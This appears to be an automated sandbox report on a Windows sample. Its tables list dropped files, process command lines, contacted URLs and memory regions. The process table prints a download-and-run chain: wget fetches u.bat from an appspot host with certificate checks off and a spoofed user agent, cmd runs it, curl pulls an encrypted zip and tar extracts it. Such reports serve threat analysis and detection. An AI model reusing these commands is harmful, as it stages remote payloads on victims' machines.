Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| `C:\Users\user\Desktop\download\u.bat` | DOS batch file, ASCII text, with CRLF line terminators | dropped | |
| `C:\Users\user\Desktop\cmdline.out` | ASCII text, with CRLF line terminators | modified | |
| `C:\Users\user\Desktop\download\u.zip` | Zip archive data, at least v2.0 to extract, compression method=AES Encrypted | modified | |
| `\Device\ConDrv` | ASCII text, with no line terminators | dropped | |
Processes

| Path | Cmdline | Malicious |
|---|---|---|
| `C:\Windows\SysWOW64\wget.exe` | `wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://upd100.appspot.com/update/u.bat"` | |
| `C:\Windows\SysWOW64\cmd.exe` | `C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://upd100.appspot.com/update/u.bat" > cmdline.out 2>&1` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\System32\cmd.exe` | `C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\download\u.bat" "` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\System32\curl.exe` | `curl -o u.zip --insecure https://upd100.appspot.com/update/u.zip` | |
| `C:\Windows\System32\tar.exe` | `tar xf u.zip` | |
URLs

| Name | IP | Malicious |
|---|---|---|
| https://upd100.appspot.com/update/u.bat | | |
| https://upd100.appspot.com/update/u.batG | unknown | |
| https://upd100.appspot.com/update/u.bat | 142.250.9.153 | |
| https://upd100.appspot.com/update/u.zipO | unknown | |
| https://upd100.appspot.com/update/u.zip | 142.250.9.153 | |
| https://upd100.appspot.com/update/u.zipcurl | unknown | |
| https://upd100.appspot.com/update/u.zipWinsta0 | unknown | |
| https://upd100.appspot.com/update/u.zipu | unknown | |
| https://upd100.appspot.com/update/u.bater | unknown | |
| https://upd100.appspot.com/update/u.zipRmWO | unknown | |
Domains

| Name | IP | Malicious |
|---|---|---|
| upd100.appspot.com | 142.250.9.153 | |
IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 127.0.0.1 | unknown | unknown | |
| 142.250.9.153 | upd100.appspot.com | United States | |
Memdumps

| Base Address | Region type | Protect | Malicious |
|---|---|---|---|
| 28312190000 | heap | page read and write | |
| 1E441DCB000 | heap | page read and write | |
| 2831228C000 | heap | page read and write | |
| 283121A0000 | heap | page read and write | |
| 9CD000 | stack | page read and write | |
| 105F000 | stack | page read and write | |
| 1D0000 | heap | page read and write | |
| 106A000 | heap | page read and write | |
| F0B77D000 | stack | page read and write | |
| 1D6000 | heap | page read and write | |
| 283122A7000 | heap | page read and write | |
| B55A8FD000 | stack | page read and write | |
| 2831229D000 | heap | page read and write | |
| 9C000 | stack | page read and write | |
| 11AE000 | heap | page read and write | |
| B60000 | heap | page read and write | |
| 106D000 | heap | page read and write | |
| B55A9FE000 | stack | page read and write | |
| 109F000 | heap | page read and write | |
| 283121E0000 | remote allocation | page read and write | |
| 1096000 | heap | page read and write | |
| 2831228C000 | heap | page read and write | |
| 11AC000 | heap | page read and write | |
| 109E000 | heap | page read and write | |
| 190000 | heap | page read and write | |
| 100000 | heap | page read and write | |
| 1090000 | heap | page read and write | |
| 28312267000 | heap | page read and write | |
| 283122D0000 | heap | page read and write | |
| 2831225B000 | heap | page read and write | |
| 2831226A000 | heap | page read and write | |
| 28312266000 | heap | page read and write | |
| 1E441DF6000 | heap | page read and write | |
| 28312250000 | heap | page read and write | |
| 2831226F000 | heap | page read and write | |
| B55AAFF000 | stack | page read and write | |
| 1E441DC0000 | heap | page read and write | |
| 1060000 | heap | page read and write | |
| E5F000 | stack | page read and write | |
| 11A0000 | heap | page read and write | |
| 18E000 | stack | page read and write | |
| 10A4000 | heap | page read and write | |
| 283121E0000 | remote allocation | page read and write | |
| 109A000 | heap | page read and write | |
| 28312270000 | heap | page read and write | |
| 283122A0000 | heap | page read and write | |
| 2831226F000 | heap | page read and write | |
| 2831228D000 | heap | page read and write | |
| ADE000 | stack | page read and write | |
| 10A5000 | heap | page read and write | |
| 283122B7000 | heap | page read and write | |
| 28312272000 | heap | page read and write | |
| 283122A4000 | heap | page read and write | |
| 283121C0000 | heap | page read and write | |
| 28312273000 | heap | page read and write | |
| 1E441D00000 | heap | page read and write | |
| B68000 | heap | page read and write | |
| 14E000 | stack | page read and write | |
| 109E000 | heap | page read and write | |
| 11A5000 | heap | page read and write | |
| 283122B7000 | heap | page read and write | |
| 1B0000 | heap | page read and write | |
| 283122E9000 | heap | page read and write | |
| 1E441D10000 | heap | page read and write | |
| 283125F0000 | heap | page read and write | |
| 283121E0000 | remote allocation | page read and write | |
| 1E0000 | heap | page read and write | |
| 10A0000 | heap | page read and write | |
| 28312257000 | heap | page read and write | |
| 2E8F000 | stack | page read and write | |
| 109A000 | heap | page read and write | |
| 11AB000 | heap | page read and write | |
| 11AD000 | heap | page read and write | |
| 10A2000 | heap | page read and write | |

There are 64 further memdumps that are hidden in the original report and not listed here.